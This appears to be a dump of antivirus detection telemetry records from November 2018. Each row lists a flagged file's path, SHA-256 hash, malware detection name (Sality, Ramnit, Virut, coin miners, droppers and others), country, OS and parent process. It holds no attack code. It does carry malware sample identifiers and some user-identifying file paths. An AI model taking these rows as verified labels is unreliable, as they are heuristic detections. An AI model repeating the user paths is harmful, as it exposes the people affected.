  Row(detection=Row(filename='a23ef7e9000c4f57a594d3c282c6c755db0866e3b3155145ad98515a2d131e00', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-33.categorizing\\A23EF7E9000C4F57A594D3C282C6C755DB0866E3B3155145AD98515A2D131E00', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='a23ef7e9000c4f57a594d3c282c6c755db0866e3b3155145ad98515a2d131e00', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T09:26:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='wordpad.exe', filepath='C:\\Program Files\\Windows NT\\Accessories\\wordpad.exe', filesize=4608000, name='TR/Patched.Gen.#M300.#R5151'), hash='0601ec0cf3b4ce7d3f82163520f8ad07a423fd089363108a90e8746e85d64610', metadata=Row(cmdline=None, country='TN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T10:20:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-204857-6c7f4acb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b8579126\\AVSCAN-20181104-204846-6A60DB9F\\AVSCAN-20181104-204857-6C7F4ACB', filesize=1216000, name='HEUR/APC.#M1.#R1'), hash='2b17d6f6b7e21cc644ab6f3134f5ecc9aaf3fc29bc9f2d87e61735a5560e1034', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:49:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='hl.exe', filepath='\\\\?\\C:\\Counter-Strike Global Offensive 1.0\\hl.exe', filesize=5888000, name='SPR/GameHack.6980e9.#M1.#R1'), hash='6980e96106136eb42b4248e91bea4f08b08c5ec3a21151e9513d02edf45a74ae', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T13:30:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='alienshooter.exe', filepath='E:\\العاب\\Alien Shooter\\AlienShooter.exe', filesize=1024000, name='W32/Sality.AT.#M1.#R1'), hash='1758d8dab8946ca04a861877e9821b4e89b41bc340e549bc412193b502057933', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe5_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe5 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-04T21:08:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-201822-29719e6c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0e3305e6\\AVSCAN-20181104-201724-20E48992\\AVSCAN-20181104-201822-29719E6C', filesize=392000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='94c34b095ea2036b080bd8ce1da0cf179e22a3b614e4169996710daa9f9b8f64', metadata=Row(cmdline=None, country='TN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:18:23Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-221911-af52b7a1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-214003-0813A641\\AVSCAN-20181104-221911-AF52B7A1', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T13:19:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-175459-2a02b891', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_313edb4a\\AVSCAN-20181104-175437-26EDC1B0\\AVSCAN-20181104-175459-2A02B891', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T16:55:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-203615-2b7d5b86', filepath='C:\\Documents and Settings\\X\\Application Data\\Avira\\Antivirus\\TEMP\\AVSCAN-20181104-203556-2746A838\\AVSCAN-20181104-203615-2B7D5B86', filesize=192000, name='TR/Crypt.ZPACK.71063b.#M1.#R1'), hash='71063b91d8872098c2d6942af8d9e0d0d1346da19cb73a09110edac7295db7c1', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T18:36:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp001f8e8e', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp001f8e8e', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T12:32:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ma tran toan 5.exe', filepath='G:\\\xa0\\NAM HOC 2017-2018n\\ma tran toan 5.exe', filesize=1664000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='0cd1a613e871e459906b02e7a504ac121fec2540a552c77ff1b0398b976a99d0', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Microsoft Security Client\\MsMpEng.exe', parentsize=119864, timestamp='2018-11-04T10:16:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='autorun.exe', filepath='e:\\autorun.exe', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-04T09:26:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='opencv_haartraining.exe', filepath='E:\\Programs\\Developer Pro\\OpenCV\\opencv\\build\\x64\\vc11\\bin\\opencv_haartraining.exe', filesize=256000, name='W32/Neshta.A.#M1.#R1'), hash='4995d3ea19a3182b0a8eb26e6ad01e19f3aad925c41ff6fc2d77cec4ceaa3886', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ESET\\ESET Security\\ekrn.exe', parentsize=2260144, timestamp='2018-11-04T08:57:51Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-153019-a3c8a5a7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_4e1885d5\\AVSCAN-20181104-152957-A1964B86\\AVSCAN-20181104-153019-A3C8A5A7', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T14:30:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='dup2patcher.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\dup2patcher.dll', filesize=64000, name='TR/Kazy.64000.13.#M1.#R1'), hash='63cca7c71b7d914ec4cb900dea1c1de7e17481d8e9a3b1b1e87ca301df283f7e', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='H:\\abg  long comel\\fimora\\Wondershare  Filmora Universal Crack[FreeIDMZone].exe', parentsize=324096, timestamp='2018-11-04T07:35:51Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered tisir', filepath='C:\\WINDOWS\\System32\\Tasks\\Yahoo! Powered tisir', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='8526df54488745e1e85c05d2a04cd546df21d06ba727eeae68b84f25a5b2cf6b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T15:00:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-221859-ad2a2d6c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-214003-0813A641\\AVSCAN-20181104-221859-AD2A2D6C', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T13:19:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='setup.exe', filepath='E:\\SOFT 2014\\Scanner Driver\\Microtek Scanner ScanMaker 610060005900 Driver\\pi_finereader_v4_0\\Setup.exe', filesize=128000, name='W32/Sality.AW.#M1.#R1'), hash='2c969b5edad21926aedf1f2b8b21e7255dda9080bc837ccc29a4c49b942118a9', metadata=Row(cmdline=None, country='BD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\dwm.exe', parentsize=92672, timestamp='2018-11-04T03:01:51Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='rlistupdater', filepath='/Users/tomgoode/Applications/Advanced Mac Cleaner.app/Contents/Resources/helperamc.app/Contents/Resources/rlistupdater.app/Contents/MacOS/rlistupdater', filesize=204000, name='OSX/GT32SupportGeeks.owcbg.#M0.#R0'), hash='877421f09497bb504dde87c3107888c89f174b955dacb088873bf9754babe5f3', metadata=Row(cmdline=None, country='US', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T21:27:13Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-202429-b171b541', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1820c65b\\AVSCAN-20181104-202235-A6D9D9AD\\AVSCAN-20181104-202429-B171B541', filesize=8932000, name='TR/Decep.PCfighter.6547.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='LI', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T19:24:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='password_idm.exe', filepath='\\\\?\\C:\\ProgramData\\silent\\password_IDM.exe', filesize=64000, name='HEUR/APC.#M1.#R1'), hash='35db408b7e00c3a0201978750faafc034292a9caf7bcf9f12d0a5889f03e385c', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T11:24:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='uts.exe', filepath='G:\\Users\\X\\Downloads\\Document\\Algo Laporan\\UTS.exe', filesize=128000, name='W32/Neshta.A.#M1.#R1'), hash='92f192e8b1c27a25fa6348735b0eea10830ab5072cde7046172f8ef917aaa1e3', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T16:54:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='qipapp.exe', filepath='C:\\Users\\X\\AppData\\Roaming\\QIPApp\\QIPApp.exe', filesize=320000, name='HEUR/AGEN.1004090.#M1.#R1'), hash='a9b9b83dae89b09e76c096c14e92449a08ab737fa20012f681990a159f6aa306', metadata=Row(cmdline='\\\\\\/uac', country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\programm\\CCleaner.exe', parentsize=13797712, timestamp='2018-11-02T13:09:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-162128-e2d73994', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_24e655c8\\AVSCAN-20181102-162112-DF221678\\AVSCAN-20181102-162128-E2D73994', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='PR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T20:22:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup.exe', filepath='D:\\PLAQUINHAS DIVERTIDAS\\PROGRAMAS\\Drivers Rodolfo\\Intel Chipsets driver\\Setup.exe', filesize=1024000, name='W32/Stanit.#M1.#R1'), hash='ff15b60196808f4c4d4aff891a80adc14e3dc06a6600d8cae379923f187ab05b', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T04:32:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-153556-391f2ce6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2acb2827\\AVSCAN-20181102-153349-276DD231\\AVSCAN-20181102-153556-391F2CE6', filesize=17176000, name='APPL/Asparnet.ffffde.#M1.#R1'), hash='ffffde154bf6b36d0ceb7f5f9526b2c9dcc09f0ab5311db78069990dd47522d6', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T14:36:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='resmgr.exe', filepath='C:\\Program Files\\VONE\\TopSecSV\\ResMgr.exe', filesize=1768000, name='TR/Patched.Gen.#M300.#R2947'), hash='8bbd5bcc59566245477e24d3760bc4ec864d49d1a62f471d5694424c8f6afa25', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:+rpm7Kk+OUW7kEhe.1', country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=122536, timestamp='2018-11-02T00:31:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='71dff8a9a8dba592d6d93914da2ef77f6405da2d5095d6323064345527b900a3', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T09:35:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp0000cefb', filepath='C:\\Windows\\Temp\\d273b1d6-74d4-409f-b71c-f02a76aadc41\\tmp000004c4\\tmp0000cefb', filesize=12800000, name='TR/Crypt.EPACK.Gen2.#M300.#R100581'), hash='ad0aef261c1af41c7bfa67c73e5b7d6613b55d8a1a21a8430796a72a3514ff2b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\adaware\\adaware antivirus\\adaware antivirus\\12.2.889.11556\\AdAwareService.exe', parentsize=587832, timestamp='2018-11-02T11:10:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='$rpeivy6.exe', filepath='C:\\$Recycle.Bin\\S-1-5-21-3551994574-281647338-516336352-1000\\$RPEIVY6.exe', filesize=2288000, name='PUA/InstallCore.Gen.#M300.#R8158'), hash='7de37151631e6b3e5a3928fc1f64cccc09649bf5a1cb2fa82854f7f25c026cb8', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2868224, timestamp='2018-11-02T21:35:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='7fe6fa9b9e5e57ecbf4d8d1b82322641e77c0d325008dc0bbdd9cd705201b3ff', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\7FE6FA9B9E5E57ECBF4D8D1B82322641E77C0D325008DC0BBDD9CD705201B3FF', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='7fe6fa9b9e5e57ecbf4d8d1b82322641e77c0d325008dc0bbdd9cd705201b3ff', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:16:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='diagnosticshub.standardcollector.service.exe', filepath='C:\\Windows\\System32\\DiagSvcs\\DiagnosticsHub.StandardCollector.Service.exe', filesize=64000, name='TR/Crypt.XPACK.Gen3.#M300.#R200156'), hash='a96290b02ca8f9ec46bf2021980c1cdb156290d0d603123a65cf58b56323af56', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T16:13:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='agm.dll', filepath='C:\\Program Files\\Adobe\\Acrobat 9.0\\Acrobat\\agm.dll', filesize=5760000, name='W32/Ramnit.CD.#M1.#R1'), hash='cc465ed7f2e62b4ab474979ff5ecd27af4da2969c06384a4db099a2c34e25d9f', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Adobe\\Acrobat 9.0\\Acrobat\\acrobat_sl.exe', parentsize=37232, timestamp='2018-11-02T04:46:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='client.exe', filepath='C:\\ProgramData\\Client\\client.exe', filesize=9000000, name='TR/Dropper.Gen.#M2.#R3322'), hash='7745746bba7ce1690b27dad90b72ef32a5c403d83ddbdddda1ab39e26b3c0768', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T04:59:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='xerces-c_1_6_0.dll', filepath='C:\\Users\\X\\Downloads\\Autocad2009_minixiazai.com(1)\\cad2009zwpjb\\x86\\xerces-c_1_6_0.dll', filesize=1536000, name='W32/Ramnit.CD.#M1.#R1'), hash='9e6c5c9697c88dfcb84830e97babf1fbc63f8c045489538a2444975ee854e01f', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe38_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe38 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=297472, timestamp='2018-11-02T20:38:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='bhvuildk.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\bhvuIlDK.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:30:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a035493e565a4d236e004f6c4313186bbe1b8a528d9093031e5e4387249d9bbd', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_28.10.2018-19.available\\Avira\\A035493E565A4D236E004F6C4313186BBE1B8A528D9093031E5E4387249D9BBD', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='a035493e565a4d236e004f6c4313186bbe1b8a528d9093031e5e4387249d9bbd', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-02T05:43:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='lostlands_icespell_ce.wrp.exe', filepath='D:\\ИГРУШКИ\\Затерянные земли. Ледяное заклятие X\\LostLands_IceSpell_CE.wrp.exe', filesize=3200000, name='HEUR/AGEN.1027017.#M1.#R1'), hash='ddf358abc237458efcff4f27d79f790fc905dbc4e1258eb43d0d80a51be54bee', metadata=Row(cmdline=None, country='BY', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:32:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='uninstaller.exe', filepath='\\\\?\\C:\\Program Files\\NPMB1ZB4Z7\\uninstaller.exe', filesize=192000, name='TR/Dropper.Gen.#M300.#R4133'), hash='ea132d9599c4b7d1031592e250b738eef2a2a285c325a23421d2f8e918699ac7', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T06:49:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='qtposition_geoclue.dll', filepath='C:\\Program Files\\Zaxar\\position\\qtposition_geoclue.dll', filesize=192000, name='W32/Ramnit.C.#M1.#R1'), hash='efb62f8fae89c7b56d4dba8a6c16bffd635ecdeb012d171870302e4a4c62f2ef', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe12_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe12 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T19:20:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\feiksbtzyjk\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline='-k netsvcs', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T04:02:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='dumpshx.exe', filepath='\\\\ts-xelcea\\share\\programmi\\Acad2010\\x64\\acad\\program files\\Root\\Express\\dumpshx.exe', filesize=64000, name='W32/Stanit.#M1.#R1'), hash='d40699c378a0c916027c6a19653558e61292d19867980459d7e24454d0d8dbd5', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:tJAfutT8U0ao\\\\\\/TyB.1', country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T08:32:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a5456a132fd9c594cfe1bd3d379ef6a0ebf3c79e0fbd54e8eb3ebf3cf829e9fd', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_28.10.2018-19.available\\Avira\\A5456A132FD9C594CFE1BD3D379EF6A0EBF3C79E0FBD54E8EB3EBF3CF829E9FD', filesize=1280000, name='HEUR/AGEN.1029502.#M1.#R1'), hash='a5456a132fd9c594cfe1bd3d379ef6a0ebf3c79e0fbd54e8eb3ebf3cf829e9fd', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-02T05:43:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='\\\\?\\C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='90d5d54a42d25213105034790875ad1d074f2b60424fc844f819963b7e6a590d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:24:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\yyi31h2gqfc\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline='2 3.1541057594.5bdaac3aa25a4', country='CN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\Backs\\519145534.exe', parentsize=671232, timestamp='2018-11-02T05:56:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='killbox.exe', filepath="H:\\Hirens.BootCD.15.2\\Hiren's.BootCD.15.2\\HBCD\\Programs\\KillBox.exe", filesize=196000, name='W32/Ramnit.C.#M1.#R1'), hash='e0ce96af2847403ea4c68b2954486309f4544b81c02bcc738c98191fb6aacce4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Internet Explorer\\iexplore.exe', parentsize=770648, timestamp='2018-11-02T16:22:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='dbde8c29f26259d9d0123e3fb454641ed87b4b453672f843d2f8f5cbb63a1e5d', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-30\\DBDE8C29F26259D9D0123E3FB454641ED87B4B453672F843D2F8F5CBB63A1E5D', filesize=2176000, name='HEUR/AGEN.1034483.#M1.#R1'), hash='dbde8c29f26259d9d0123e3fb454641ed87b4b453672f843d2f8f5cbb63a1e5d', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-30.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-3.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-27.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-28.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-29.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T13:07:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-080747-54511625', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_14358ac3\\AVSCAN-20181031-234307-8D092D33\\AVSCAN-20181102-080747-54511625', filesize=22980000, name='PUA/Fusion.DQ.#M1.#R1'), hash='f778b6f7714dee9066ca7d18aaa572b7e824a3cd871882687d20c61073cbd797', metadata=Row(cmdline=None, country='SA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:09:43Z'), dt=datetime.date(2018, 11, 2)),
